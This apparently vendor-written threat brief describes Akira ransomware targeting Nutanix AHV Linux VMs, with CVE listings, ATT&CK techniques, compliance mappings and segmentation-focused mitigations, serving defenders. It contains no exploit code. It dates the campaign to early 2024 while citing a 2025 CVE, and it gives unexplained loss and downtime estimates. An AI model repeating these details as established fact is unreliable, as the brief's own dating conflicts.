Akira Ransomware Targets Nutanix AHV Linux VMs: 2024 Attack Analysis
Executive Summary
In early 2024, threat actors associated with the Akira ransomware group expanded their operations to target Nutanix AHV virtual machines (VMs) running on Linux, according to alerts from CISA and other cybersecurity agencies. By leveraging compromised credentials or exploiting vulnerabilities, attackers gained access to enterprise infrastructure and deployed a Linux-based Akira encryptor capable of encrypting entire Nutanix VM environments. This strategy disrupted critical workloads and led to significant operational downtime, as well as potential data loss and extortion threats for affected organizations.
This incident underscores a trend of ransomware groups shifting focus toward virtualization platforms and cloud infrastructure, extending risks beyond traditional endpoints. The Akira campaign highlights the growing sophistication of ransomware TTPs and the urgent need for robust segmentation and lateral movement controls within virtualized environments.
Why This Matters Now
Virtualization platforms like Nutanix AHV are increasingly targeted by ransomware groups seeking maximum impact. The Akira attack illustrates the need for organizations to secure not just endpoints, but also internal traffic, lateral movement, and VM environments. As more critical business operations migrate to virtualized and cloud infrastructures, these attack methods present urgent and evolving threats requiring immediate attention and updated defenses.
Attack Path Analysis
The Akira ransomware threat actors initially gained access to Nutanix AHV virtualized Linux environments, likely exploiting exposed attack surfaces or stolen credentials. Once inside, they escalated privileges to gain administrative control over workloads. The adversaries moved laterally across east-west network paths within the cloud infrastructure to discover and access additional VMs. They established command and control to maintain persistence, potentially using encrypted or covert channels. Data was prepared for exfiltration or staged for impact, but the main objective was to encrypt data and disrupt services by deploying the ransomware on Nutanix VMs.
Kill Chain Progression
Initial Compromise
Description
Adversaries breached the cloud environment hosting Nutanix AHV VMs, potentially via exposed services, misconfigurations, or compromised credentials.
Related CVEs
CVE-2024-40766
CVSS 9.6A critical vulnerability in SonicWall SonicOS allows remote attackers to execute arbitrary code via crafted requests.
Affected Products:
SonicWall SonicOS – Gen 5, Gen 6, Gen 7
Exploit Status:
exploited in the wildCVE-2023-27532
CVSS 7.5A vulnerability in Veeam Backup & Replication allows unauthenticated users to request encrypted credentials, leading to potential privilege escalation.
Affected Products:
Veeam Backup & Replication – < 12.0.0.1420
Exploit Status:
exploited in the wildReferences:
CVE-2024-40711
CVSS 9.8A vulnerability in Veeam Backup & Replication allows remote code execution due to improper input validation.
Affected Products:
Veeam Backup & Replication – < 12.0.0.1420
Exploit Status:
exploited in the wildReferences:
CVE-2025-23114
CVSS 9A vulnerability in Veeam Updater component allows Man-in-the-Middle attackers to execute arbitrary code on the affected server.
Affected Products:
Veeam Backup for Nutanix AHV – 5.0, 5.1
Exploit Status:
proof of conceptReferences:
MITRE ATT&CK® Techniques
Valid Accounts
System Services: Service Execution
Command and Scripting Interpreter: Unix Shell
Impair Defenses: Disable or Modify Tools
Ingress Tool Transfer
Data Encrypted for Impact
Resource Hijacking
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Authenticate access to system components
Control ID: 8.2.4
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management
Control ID: Article 13
CISA ZTMM 2.0 – Continuous Asset Monitoring
Control ID: Asset Management #3
NIS2 Directive – Incident Handling and Business Continuity
Control ID: Article 21(2)(d)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Health Care / Life Sciences
Akira ransomware targeting Nutanix VMs threatens patient data encryption, disrupting critical healthcare operations while violating HIPAA compliance requirements for data protection.
Financial Services
Ransomware attacks on virtualized banking infrastructure risk encrypted customer data, transaction systems disruption, and non-compliance with PCI DSS security standards.
Government Administration
CISA's warning highlights government agencies' vulnerability to Akira ransomware encrypting virtual machines, potentially compromising sensitive data and critical public services.
Information Technology/IT
IT organizations using Nutanix virtualization face direct ransomware exposure, requiring enhanced zero trust segmentation, threat detection, and multicloud security controls.
Sources
- CISA warns of Akira ransomware Linux encryptor targeting Nutanix VMshttps://www.bleepingcomputer.com/news/security/cisa-warns-of-akira-ransomware-linux-encryptor-targeting-nutanix-vms/Verified
- Response to CISA Security Advisory Related to a Third-Party Vulnerabilityhttps://www.nutanix.com/blog/response-to-cisa-security-advisory-related-to-a-third-party-vulnerability-allowing-the-targeting-of-major-hypervisor-vendorsVerified
- Akira Ransomware Now Targeting Nutanix VMshttps://www.techradar.com/pro/security/akira-ransomware-is-now-targeting-nutanix-vms-and-scoring-big-rewardsVerified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Implementing Zero Trust segmentation, robust east-west traffic controls, and real-time threat detection across cloud workloads would have prevented privilege abuse, restricted lateral movement, detected anomalous actions, and blocked unauthorized egress, thereby reducing ransomware's reach and impact. CNSF-aligned controls enforce least privilege, workload isolation, encrypted traffic inspection, and automated policy to drastically limit the attacker's opportunities across every stage.
Control: Cloud Firewall (ACF)
Mitigation: Blocked unauthorized inbound access to exposed services.
Control: Zero Trust Segmentation
Mitigation: Prevents broad admin rights propagation across workloads.
Control: East-West Traffic Security
Mitigation: Stops lateral traversal between workloads and segments.
Control: Inline IPS (Suricata)
Mitigation: Detects and blocks malicious or suspicious command and control traffic.
Control: Egress Security & Policy Enforcement
Mitigation: Suppresses unauthorized or sensitive outbound data flows.
Rapid detection and response to ransomware TTPs mitigates damage.
Impact at a Glance
Affected Business Functions
- Virtualization Infrastructure
- Data Storage
- Backup and Recovery
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive virtual machine data, including customer information and proprietary business data.
Recommended Actions
Key Takeaways & Next Steps
- • Enforce granular Zero Trust Segmentation and workload isolation to prevent lateral movement within cloud environments.
- • Implement East-West Traffic Security and inline IPS controls to block suspicious intra-cloud and egress communications.
- • Deploy robust Egress Security & Policy Enforcement to detect and prevent unauthorized data exfiltration attempts by ransomware.
- • Continuously monitor for threats using real-time anomaly response and automated alerting across cloud workloads.
- • Regularly review and update cloud firewall policies to restrict exposure of management interfaces and sensitive services.
